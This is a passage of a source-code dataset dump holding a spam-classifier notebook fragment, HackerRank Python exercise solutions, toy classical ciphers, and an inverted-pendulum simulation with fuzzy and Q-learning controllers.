using all data, on 
the best detected classifier\n n_jobs=-1, # number of cores to use for parallelization; -1 for \"all cores\"\n scoring='accuracy', # what score are we optimizing?\n cv=StratifiedKFold(label_train, n_folds=5), # what type of cross validation to use\n)\n\n#%time\nsvm_detector = grid_svm.fit(msg_train, label_train) # find the best combination from param_svm\nprint(svm_detector.grid_scores_)\n\nprint(svm_detector.predict([\"Hi mom, how are you?\"])[0])\nprint(svm_detector.predict([\"WINNER! Credit for free!\"])[0])\n\nprint(confusion_matrix(label_test, svm_detector.predict(msg_test)))\nprint(classification_report(label_test, svm_detector.predict(msg_test)))\n\nprint(confusion_matrix(label_test, svm_detector.predict(msg_test)))\nprint(classification_report(label_test, svm_detector.predict(msg_test)))\n\n## Productionalizing a predictor\n\n# store the spam detector to disk after training\nwith open('sms_spam_detector.pkl', 'wb') as fout:\n cPickle.dump(svm_detector, fout)\n\n# ...and load it back, whenever needed, possibly on a different machine\nsvm_detector_reloaded = cPickle.load(open('sms_spam_detector.pkl'))\n\nprint('before:', svm_detector.predict([message4])[0])\nprint('after:', svm_detector_reloaded.predict([message4])[0])" }, { "alpha_fraction": 0.6301369667053223, "alphanum_fraction": 0.6301369667053223, "avg_line_length": 10.578947067260742, "blob_id": "3cee4ba2747431bf0e13554d7845c59907a7dcb3", "content_id": "67c6b523dbbaa9d1b71ab1abd74c5b64d96f9bcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 57, "num_lines": 19, "path": "/itertools_combinations_with_replacements.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from itertools import combinations_with_replacement\n\na,b = input().split()\n\nx = list(combinations_with_replacement(sorted(a),int(b)))\nfor i in x:\n print(\"\".join(i))\n\n\n# AA\n# AC\n# AH\n# AK\n# 
CC\n# CH\n# CK\n# HH\n# HK\n# KK" }, { "alpha_fraction": 0.5038461685180664, "alphanum_fraction": 0.5730769038200378, "avg_line_length": 15.3125, "blob_id": "331964ca5f000d0ff3af5cf10b57d3375f1ad150", "content_id": "84bbade0b5cd86a05179c51086914d3a6e83d800", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 49, "num_lines": 16, "path": "/symmtric_diff.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "m = int(input())\nmy_set1 = set(map(int, input().split()))\nn = int(input())\nmy_set2 = set(map(int, input().split()))\n\nfinal_set = my_set1.symmetric_difference(my_set2)\nx = sorted(final_set)\n\nfor i in x:\n print(i)\n\n#\n# 4\n# 2 4 5 9\n# 4 00\n# 2 4 11 12=" }, { "alpha_fraction": 0.5583333373069763, "alphanum_fraction": 0.5583333373069763, "avg_line_length": 19.16666603088379, "blob_id": "dc2ae3919af8ca8ec2fc0b69d7495509a8fc9ce8", "content_id": "ee7cd49f65943d9d9a388f42da159f6bc1eda7c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 120, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/print_rangoli.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def print_rangoli(size):\n # your code goes here\n\nif __name__ == '__main__':\n n = int(input())\n print_rangoli(n)" }, { "alpha_fraction": 0.47641509771347046, "alphanum_fraction": 0.4921383559703827, "avg_line_length": 31.615385055541992, "blob_id": "b9f62df6dd87e8e52bb1b22e02869f2f6cff1c7c", "content_id": "05647f9f615e58b113caad91360dd81c642ed599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "no_license", "max_line_length": 135, "num_lines": 39, "path": "/find_string.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def count_substring(string, 
sub_string):\n\n return(sum([1 for i in range(len(string) - len(sub_string) + 1) # we move through the string here and check if we are able\n if string[i:i + len(sub_string)] == sub_string])) # to find the substring in the string and generate 1 for each time\n # it is true and then we add all the 1's in the list\nif __name__ == '__main__':\n string = input().strip()\n sub_string = input().strip()\n\n count = count_substring(string, sub_string)\n print(count)\n\n\n#METHOD 2:\n# def count_substring(string, sub_string):\n# count=0\n# #print(len(string),len(sub_string))\n# for i in range(0, len(string)-len(sub_string)+1):\n# if string[i] == sub_string[0]:\n# flag=1\n# for j in range (0, len(sub_string)):\n# if string[i+j] != sub_string[j]:\n# flag=0\n# break\n# if flag==1:\n# count += 1\n# return count\n\n\n\n#METHOD 3:\n # count = 0\n # i = 0\n # while i < len(string):\n # if string.find(sub_string, i) >= 0:\n # i = string.find(sub_string, i) + 1\n # count += 1\n # else:\n # break\n" }, { "alpha_fraction": 0.44075828790664673, "alphanum_fraction": 0.4881516695022583, "avg_line_length": 22.55555534362793, "blob_id": "08e0d716ffd00192ff774d78473bd8b5728e69e9", "content_id": "835c0d374fa13fe2ef55d9d2a2059da9385b0276", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 211, "license_type": "no_license", "max_line_length": 36, "num_lines": 9, "path": "/door_mat_design.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "s = input().split()\nN = int(s[0])\nM = int(s[1])\nc = '.|.'\nfor i in range(N//2):\n print((c*(2*i+1)).center(M,'-'))\nprint('WELCOME'.center(M,'-'))\nfor i in range(N//2,0,-1):\n print((c*(2*i-1)).center(M,'-'))" }, { "alpha_fraction": 0.49833887815475464, "alphanum_fraction": 0.5448504686355591, "avg_line_length": 20.571428298950195, "blob_id": "e5825ea2597ddf88e788ddc97a1f204d580b68f6", "content_id": "0b1bc5f25b62a9c7a5f7de9fb6df8c5a2b02b69d", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 45, "num_lines": 14, "path": "/captain_room.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "K = int(input())\nlist1 = list(map(int,input().split()))\n\n# for i in list1:\n# if list1.count(i) != K:\n# print(i)\n\nset1 = set(list1)\n# print(set1)\n# print(sum(set1)*K)\n# # ans = ((sum(set1)*K) - sum(list1)) // K-1\n# # print(ans)\n# print(sum(list1))\nprint((sum(set1)*K - sum(list1)) // (K-1))" }, { "alpha_fraction": 0.53125, "alphanum_fraction": 0.6656249761581421, "avg_line_length": 25.75, "blob_id": "e599fd836ffb7dff85bc4d9d7dd768928b0ffced", "content_id": "60b3318c4a8d818f01a3cd4a995a624e95f23fff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "no_license", "max_line_length": 75, "num_lines": 12, "path": "/math_triangle_quest_2.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# problem is to print palindromic string in format\n# 1\n# 121\n# 12321\n# 1234321\n# 123454321\n# for n = 5\n# in this we can detect a pattern that each line is square of 1, 11, 111...\n# that is it is square of increasing numbers of 1\n# also input limit is 0-10\nfor x in range(1,int(input())+1):\n print(((10**x - 1)//9)**2)" }, { "alpha_fraction": 0.6741213798522949, "alphanum_fraction": 0.6741213798522949, "avg_line_length": 33.88888931274414, "blob_id": "1e671596c1b4cee27c1df0918b850545afb08c2f", "content_id": "7c2e471c69623bfe46b121a800afaf45ae65a547", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 79, "num_lines": 9, "path": "/date_and_time_calender.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "import calendar\ndays = 
['MONDAY','TUESDAY','WEDNESDAY','THURSDAY','FRIDAY','SATURDAY','SUNDAY']\nmonth, day, year = map(int, input().split())\n\nprint(days[(calendar.weekday(year,month,day))])\n\n# ONE LINE ANSWER\n# m, d, y = map(int, input().split())\n#print(list(calendar.day_name)[calendar.weekday(y, m, d)].upper())" }, { "alpha_fraction": 0.5091678500175476, "alphanum_fraction": 0.5162200331687927, "avg_line_length": 24.35714340209961, "blob_id": "b16581d2fc65fcd5beb8897b7af9a6144d42ddfa", "content_id": "8640b9eef80bf49ff652aa752b07dd1ccc298553", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 709, "license_type": "no_license", "max_line_length": 77, "num_lines": 28, "path": "/merge_the_tools.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def merge_the_tools(string, k):\n\n for part in zip(*[iter(string)] * k):\n print(part)\n d = dict()\n print(''.join([ d.setdefault(c, c) for c in part if c not in d ]))\n\nif __name__ == '__main__':\n string, k = input(), int(input())\n merge_the_tools(string, k)\n\n#Method 2:\n# s=raw_input()\n# k=int(raw_input())\n# n=len(s)\n#\n# for x in xrange(0, n, k):\n# slicedStr = s[x : x+k]\n# uni =[]\n# for y in slicedStr:\n# if y not in uni:\n# uni.append(y)\n# print ''.join(uni)\n\n# Method 3:\n# ts = [string[ind:ind+k] for ind, s in enumerate(string) if ind % k == 0]\n# for s in ts:\n# print(\"\".join([x for ind, x in enumerate(s) if x not in s[0:ind]]))" }, { "alpha_fraction": 0.610362708568573, "alphanum_fraction": 0.6362694501876831, "avg_line_length": 18.693878173828125, "blob_id": "d65090d00468e76e0d3a6a512af998a2c7881f30", "content_id": "7df0dddfca0a4e1285273c94e07720e3d363d31b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 965, "license_type": "no_license", "max_line_length": 51, "num_lines": 49, "path": "/monosubstituition_cipher.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", 
"text": "def encrypt():\n pass\ndef decrypt():\n pass\n\nAlphabet = 'abcdefghijklmnopqrstuvwxyz'\nlist1 = list(Alphabet)\n#print(list1)\n\nshift_key = input(\"Enter the ciphertext alphabet:\")\n#print(shift_key)\n\n#checking if the key is monoaplphabetic\nif len(shift_key)>1:\n print(\"Error: Key to be only single letter.\")\n\nlist2 = []\nlist2.append(shift_key.lower())\n#print(list2)\n\na = list1.index(shift_key.lower())\n\nfor i in list1[a+1:]:\n list2.append(i.lower())\nfor i in list1[:a]:\n list2.append(i.lower())\n\n#print(list2)\nlist3 = []\nlist4 = []\n\nplain_text = input(\"Enter the Message:\").split()\n\nfor i in plain_text:\n for j in i:\n #print(j)\n x = list1.index(j.lower())\n #print(x)\n list3.append(list2[x])\n#print(list3)\n\nfor i in list3:\n x = list2.index(i.lower())\n list4.append(list1[x])\n\ne_msg = ''.join(map(str, list3))\nd_msg = ''.join(map(str, list4))\nprint(f\"Encrypted message is: {e_msg}\")\nprint(f\"Decrypted message is: {d_msg}\")\n" }, { "alpha_fraction": 0.7071823477745056, "alphanum_fraction": 0.7127071619033813, "avg_line_length": 35.29999923706055, "blob_id": "81981642d0adbd526de538c1d7a6d83ee4e53e05", "content_id": "1b80f6cae1fab38c92a3172dce3eb7f7f948f416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 73, "num_lines": 10, "path": "/math_find_angle_abc.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# got new thing to learn\nimport math\na = int(input())\nb= int(input())\n\n# atan2() intakes two arguments instead of one for atan()\n# The gimmick is, the line that bisects the hypoteneuse will end up going\n# through the other corner of the rectangle with sides a and b.\n# So we're just figuring atan(a,b)\nprint(str(int(round(math.degrees(math.atan2(a,b))))) + '°')" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.5634920597076416, "avg_line_length": 
15.866666793823242, "blob_id": "a7f1a94c384d5ac2f70aa79d9f5dd420bde090c4", "content_id": "706c70763459afdeda6299d5fa874f6f89e4e885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 37, "num_lines": 15, "path": "/ordered_dict.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# from collections import OrderedDict\n# from collections import Counter\n#\n# n = int(input())\n# d = OrderedDict()\n# l = []\n#\n# for i in range(n):\n# a,b = input().split()\n# l.append(a)\n# d[a] = int(b)\n# d1 = Counter()\n#\n# print(d)\n# print(d1)" }, { "alpha_fraction": 0.5954825282096863, "alphanum_fraction": 0.5995893478393555, "avg_line_length": 24, "blob_id": "8e60fc169d19c58ff661d571c1c1f15d51975a94", "content_id": "00ccf7b24cd7771cdb6aa19b81f72ee72f651201", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 974, "license_type": "no_license", "max_line_length": 74, "num_lines": 39, "path": "/cns_railfence_cipher.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def main():\n # get the number of layers to rail encrypt\n layers = int(input(\"Enter the key: \"))\n\n # get the plain text\n plain_text = input(\"Enter the plain text: \")\n\n # encrypt the plain text\n cipher_text = encrypt(layers, plain_text)\n print(\"Encrypted text: \" + cipher_text)\n\n\ndef encrypt(layers, plain_text):\n # remove all white spaces in text\n plain_text = plain_text.replace(\" \", \"\")\n\n # change plain text to upper case\n plain_text = plain_text.upper()\n\n # divide plain text into layers number of strings\n rail = [\"\"] * layers\n #print(rail) # to check if proper number of layers/rows are formed\n\n layer = 0\n for character in plain_text:\n rail[layer] += character\n #print(rail[layer]) # just to check if things are working properly\n\n if layer >= layers - 1:\n layer = 0\n 
else:\n layer += 1\n\n cipher = \"\".join(rail)\n return cipher\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5398229956626892, "alphanum_fraction": 0.5575221180915833, "avg_line_length": 21.600000381469727, "blob_id": "f83be6d7a7a2abe12c4a3cecf689f0080e675c9a", "content_id": "c1bed99c57b667aa64b60ca129002a71e2b8ae81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 339, "license_type": "no_license", "max_line_length": 38, "num_lines": 15, "path": "/set_check_subset.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# taking number of test cases\nN = int(input())\nlist1 = []\n# taking input for sets\nfor i in range(N):\n N2 = int(input())\n A = set(map(int, input().split()))\n N3 = int(input())\n B = set(map(int, input().split()))\n\n if A.issubset(B):\n list1.append('True')\n else:\n list1.append(\"False\")\nprint('\\n'.join(list1))\n" }, { "alpha_fraction": 0.5675675868988037, "alphanum_fraction": 0.5705705881118774, "avg_line_length": 29.272727966308594, "blob_id": "5f706b15192c6ecccdb7ae49f050c2f4a56776b9", "content_id": "e4346328e12a22d2ed8d0b8972e380083081d9ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 333, "license_type": "no_license", "max_line_length": 74, "num_lines": 11, "path": "/string_validators.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "s = input()\nfor i in('isalnum()', 'isalpha()', 'isdigit()', 'islower()', 'isupper()'):\n print(any( eval('c.' 
+ i) for c in s))\n\n\n#METHOD 2:\n# print (any(i.isalnum() for i in s))\n# print (any(i.isalpha() for i in s))\n# print (any(i.isdigit() for i in s))\n# print (any(i.islower() for i in s))\n# print (any(i.isupper() for i in s))\n" }, { "alpha_fraction": 0.47547170519828796, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 16.733333587646484, "blob_id": "b1c4dd0b5ae0398ab565e61231eeff42c2cb75b6", "content_id": "8d6a2b485c48053eb54ad65c0d72c4c1b1b1130c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 63, "num_lines": 15, "path": "/math_triangle_quest.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# this ques asks to print this pattern\n#1\n# 22\n# 333\n# 4444\n# 55555\n# ......\n# when N is given we will print upto N-1\n# for example when N = 5 then we print upto N-1 i.e pattern is:\n# 1\n# 22\n# 333\n# 4444\nfor i in range(1,int(input())):\n print(((10**i)-1)//9 * i)" }, { "alpha_fraction": 0.5164835453033447, "alphanum_fraction": 0.5164835453033447, "avg_line_length": 17.399999618530273, "blob_id": "72a180c6c492fd6de97396ea2d10b6b302cdebe4", "content_id": "bd4d7c5ccd5933de8c0b5289e72df614a016fcc7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/math_integers_comes_in_all_sizes.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "a,b = int(input()), int(input())\nc,d = int(input()), int(input())\n\nx = a**b + c**d\nprint(x)" }, { "alpha_fraction": 0.443219393491745, "alphanum_fraction": 0.4696802794933319, "avg_line_length": 20.595237731933594, "blob_id": "779739b821e88a13bd9316fff89fceb1d1dfae11", "content_id": "fe13697b35204277d61ceef9fb3c3379aea326af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 907, "license_type": "no_license", "max_line_length": 59, "num_lines": 42, "path": "/ceaser_cipher.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "\ndef encrypt(text, key):\n result = \"\"\n\n for i in range(len(text)):\n char = text[i]\n\n if (char == ' '):\n result += ' '\n\n elif (char.isupper()):\n result += chr((ord(char) + key - 65) % 26 + 65)\n\n else:\n result += chr((ord(char) + key - 97) % 26 + 97)\n\n return result\n\ndef decrypt(result, key):\n d_res = \"\"\n\n for i in range(len(result)):\n char = result[i]\n\n if (char == ' '):\n d_res += ' '\n\n elif (char.isupper()):\n d_res += chr((ord(char) - key - 65) % 26 + 65)\n\n else:\n d_res += chr((ord(char) - key - 97) % 26 + 97)\n\n return d_res\n\np_text = input(\"Enter Plain text:\")\nkey = int(input(\"Enter the key:\"))\nprint('\\n')\nprint(\"Text : \" + p_text)\nprint(\"Shift : \" + str(key))\ne_res = encrypt(p_text, key)\nprint(\"Cipher: \" + e_res)\nprint(\"Decrypted: \" + decrypt(e_res,key))" }, { "alpha_fraction": 0.5829959511756897, "alphanum_fraction": 0.6255060434341431, "avg_line_length": 16.068965911865234, "blob_id": "436144475a63fd6dbb7feb187c55510f5e9110fc", "content_id": "f73b630305126123104b4e3b3a1bf3d7596cea9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 494, "license_type": "no_license", "max_line_length": 64, "num_lines": 29, "path": "/set_operations.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to perform remove , pop and discard operations on sets\n\n# taking input for elements of sets\nn = int(input())\ns = set(map(int, input().split()))\n\n# we will now take input for commands to be excuted\n\nN = int(input()) # number of commands to execute\n\nfor i in range(N):\n eval('s.{0}({1})'.format(*input().split()+['']))\nprint(sum(s))\n# print(''.join(s))\n\n#\n# 9\n# 1 2 3 4 5 6 7 8 9\n# 10\n# pop\n# remove 9\n# discard 9\n# discard 8\n# 
remove 7\n# pop\n# discard 6\n# remove 5\n# pop\n# discard 5" }, { "alpha_fraction": 0.6724137663841248, "alphanum_fraction": 0.6724137663841248, "avg_line_length": 25.454545974731445, "blob_id": "774b727a42ad72aa76a244cb1961f290a36fccaa", "content_id": "81dca17ad85e7fdb13bd18c729d38c6151fe0d86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/itertools_permutations.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to print permutations of given string of given length\nfrom itertools import permutations\n\na,b = input().split()\n# print(list(a))\n# print(b)\n# print(*permutations(list(a),int(b)), sep='\\n')\nx = sorted(list(permutations(list(a),int(b))))\n# print(x)\nfor i in x:\n print(\"\".join(i))" }, { "alpha_fraction": 0.7606837749481201, "alphanum_fraction": 0.7606837749481201, "avg_line_length": 57, "blob_id": "8c30b098564d79b752356952173b77790c6c6c41", "content_id": "3e6af7e5791790b8f9cf3c01df3f620abdc363f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 59, "num_lines": 2, "path": "/any_all.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# task is to check if all the elements in list are positive\n# also whether or not if any one of them is palindromic\n\n" }, { "alpha_fraction": 0.6892655491828918, "alphanum_fraction": 0.6892655491828918, "avg_line_length": 24.428571701049805, "blob_id": "7f0ab4442dd619a369658bf4d40d59faa843f071", "content_id": "ea4e9381e090d7a9391f12004dd7b81cee7aa45c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 133, "num_lines": 7, "path": "/tuples.py", "repo_name": "shaan2348/hacker_rank", 
"src_encoding": "UTF-8", "text": "n = int(input())\n\nt = tuple(map(int,input().split())) # we are use map function here to convert the inputs from str to int because input() returns str\n\nprint(t)\n\nprint(hash(t))" } ]
52
koles161rus/invertedPendulum
https://github.com/koles161rus/invertedPendulum
e5195660e18863f768766b93c70623ecaae2bd72
214db0a5c447979b2337c9b2df8cbcb22f57bc2d
244de9995ab649a153aa6d8b9154616b1c430ecd
refs/heads/master
2020-03-30T18:25:25.152597
2018-10-04T00:40:44
2018-10-04T00:40:44
151,499,490
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.47035330533981323, "alphanum_fraction": 0.5102918744087219, "avg_line_length": 46.867645263671875, "blob_id": "a2c8d9da14a851f046fd87e8274ea0fbdd0278c8", "content_id": "bd0d8df32243ffc49a9ebd50b47aaf7e109ee146", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3255, "license_type": "no_license", "max_line_length": 83, "num_lines": 68, "path": "/inverted_pendulum (1)/inverted_pendulum/fuzzy/fuzzy_controller.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "from .fuzzyinference import FuzzyControl\nfrom math import pi\n\n\ndef get_controller():\n ctrl = FuzzyControl()\n theta_division = 12\n theta_memberships = [\n ['trapezoid_left', -1.57 / theta_division, -0.58 / theta_division, 'vn'],\n ['triangle', -0.3927 / theta_division, 0.327 * 2.0 / theta_division, 'mn'],\n ['triangle', 0.0, 0.1745 * 2.0 / theta_division, 'z'],\n ['triangle', 0.3927 / theta_division, 0.327 * 2.0 / theta_division, 'mp'],\n ['trapezoid_right', 0.58 / theta_division, 1.57 / theta_division, 'vp']\n ]\n ctrl.add_input('theta', (-4*pi, 4 * pi), theta_memberships)\n\n dtheta_division = 12\n dtheta_memberships = [\n ['trapezoid_left', -1.57 / dtheta_division, -0.58 / dtheta_division, 'vn'],\n ['triangle', -0.3927 / dtheta_division, 2 * 0.327 / dtheta_division, 'mn'],\n ['triangle', 0.0, 2 * 0.1745 / dtheta_division, 'z'],\n ['triangle', 0.3927 / dtheta_division, 2 * 0.327 / dtheta_division, 'mp'],\n ['trapezoid_right', 0.58 / dtheta_division, 1.57 / dtheta_division, 'vp']\n ]\n ctrl.add_input('dtheta', (-1 * 200, 200), dtheta_memberships)\n\n force_memberships = [\n ['trapezoid_left', -0.99, -0.75, 'vn'],\n ['triangle', -0.6, 0.4, 'sn'],\n ['triangle', -0.3, 0.4, 'mn'],\n ['triangle', 0.0, 0.4, 'z'],\n ['triangle', 0.3, 0.4, 'mp'],\n ['triangle', 0.6, 0.4, 'sp'],\n ['trapezoid_right', 0.75, 0.99, 'vp']\n ]\n ctrl.add_output('force', (-1, 1), force_memberships)\n\n 
ctrl.add_rule({'theta': 'vn', 'dtheta': 'vn'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'mn'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'z'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'mp'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'vp'}, {'force': 'vp'})\n\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'vn'}, {'force': 'vn'})\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'mn'}, {'force': 'vn'})\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'z'}, {'force': 'vn'})\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'mp'}, {'force': 'vn'})\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'vp'}, {'force': 'vn'})\n\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'vn'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'mn'}, {'force': 'sp'})\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'z'}, {'force': 'mp'})\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'mp'}, {'force': 'mp'})\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'vp'}, {'force': 'z'})\n\n ctrl.add_rule({'theta': 'z', 'dtheta': 'vn'}, {'force': 'sp'})\n ctrl.add_rule({'theta': 'z', 'dtheta': 'mn'}, {'force': 'mp'})\n ctrl.add_rule({'theta': 'z', 'dtheta': 'z'}, {'force': 'z'})\n ctrl.add_rule({'theta': 'z', 'dtheta': 'mp'}, {'force': 'mn'})\n ctrl.add_rule({'theta': 'z', 'dtheta': 'vp'}, {'force': 'sn'})\n\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'vn'}, {'force': 'z'})\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'mn'}, {'force': 'mn'})\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'z'}, {'force': 'mn'})\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'mp'}, {'force': 'sn'})\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'vp'}, {'force': 'vn'})\n\n return ctrl\n" }, { "alpha_fraction": 0.3800186812877655, "alphanum_fraction": 0.4164332449436188, "avg_line_length": 24.5238094329834, "blob_id": "45d3b80af47279e62bba18a126cf97a8e112c57f", "content_id": "c8269f6e555523c3036db510684905c6494a078e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 1071, "license_type": "no_license", "max_line_length": 89, "num_lines": 42, "path": "/inverted_pendulum (1)/inverted_pendulum/simulation/simulation.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "from math import sin, cos, pi\nimport random\n\nclass Simulator:\n def simulate_step(self, state, F, dt):\n x, x_dot, theta, theta_dot = state\n\n m = 0.2\n M = 3\n L = 0.3\n K = 0.006\n A = x\n B = x_dot\n C = theta\n D = theta_dot\n g = 9.81\n b = 0.1\n\n A = L * sin(theta)\n B = L * cos(theta)\n\n C = (B**2 + K + B**2 * m + A**2 * m) * (M + m)\n D = F * B * m + B * m**2 * A * theta_dot**2 - b * x_dot * B * m - A * g * (M + m)\n\n theta_dot_dot = D / C\n x_dot_dot = ( (F + m * A * theta_dot**2 - b * x_dot) - D / C * B * m ) / (M + m)\n\n x_dot = state[1] + x_dot_dot * dt\n x = state[0] + x_dot * dt + x_dot_dot * dt * dt / 2\n\n theta_dot = state[3] + theta_dot_dot * dt\n theta = state[2] + theta_dot * dt + theta_dot_dot * dt * dt / 2\n\n return [ x, x_dot, theta, theta_dot ]\n\n def random_state(self, state):\n state[0] = 10\n state[1] = 0\n state[2] = pi - 60 * pi / 180\n state[3] = 0\n\n return state" }, { "alpha_fraction": 0.45028865337371826, "alphanum_fraction": 0.4855676591396332, "avg_line_length": 34.43939208984375, "blob_id": "3fe34d042ae3ef5607740c2e372eb1bcd686e98a", "content_id": "c4698aeaf5a9bd09fcb20d27972f48f911585dfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4677, "license_type": "no_license", "max_line_length": 160, "num_lines": 132, "path": "/inverted_pendulum (1)/main.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "from inverted_pendulum.qlearning.qlearning import QLearning\nfrom inverted_pendulum.fuzzy.fuzzy_controller import *\nfrom numpy import pi, cos, sin\nimport random\n\nimport matplotlib.pyplot as plt\n\nfrom inverted_pendulum.simulation.simulation import Simulator\nimport numpy as 
np\n\n\nclass InvertedPendulumBalancer:\n def __init__(self):\n self.dt = 0.01\n random.seed(200)\n self.max_force = 125\n self.step_n = int( 10 * 10**6 )\n self.last_n = 500 * 10**3\n self.simulator = Simulator()\n\n self.controller = QLearning( max_theta=2*pi, max_dtheta=30, max_x=60000, max_dx=40, n_x=10, n_dx=10, n_theta=6, n_dtheta=20, n_action=5, is_fuzzy=True )\n\n def plot_survival_times(self):\n survival_times = []\n for i in range(len(lines)):\n if i >= 1:\n survival_times.append(10*(lines[i][0] - lines[i - 1][0]))\n plt.plot(survival_times)\n plt.plot([last_n for s in survival_times])\n plt.show()\n\n def plot_states():\n plt.plot(thetas)\n for l in lines:\n plt.axvline(l[0], color=l[1], alpha=0.5)\n plt.plot(xs)\n plt.show()\n\n def run(self):\n state = [10, 0, pi, 0]\n t = 0\n plot_n = 7\n plot_resolution = 1\n\n states = []\n last_stable = 0\n survival_times = []\n survival_time = 0\n lines = []\n\n plt.rc_context({'axes.edgecolor':'orange', 'xtick.color':'red', 'ytick.color':'green', 'figure.facecolor':'white', 'axes.linewidth': 2})\n\n plt.ion()\n mng = plt.get_current_fig_manager()\n mng.resize(*mng.window.maxsize())\n\n theta_ax = plt.subplot2grid((4,3), (2,0), colspan=3)\n x_ax = plt.subplot2grid((4,3), (3,0), colspan=3)\n cart_ax = plt.subplot2grid((2,3), (0,0), colspan=3)\n\n for i in range(self.step_n):\n state[2] += (random.random() - 0.5) * 0.001\n survival_time += 1\n \n t = t + self.dt\n\n prev_state = state\n if i % plot_resolution == 0:\n survival_times.append(survival_time)\n states.append(state)\n\n if i % 1000 == 0:\n if len(states) > self.last_n / plot_resolution:\n xs = 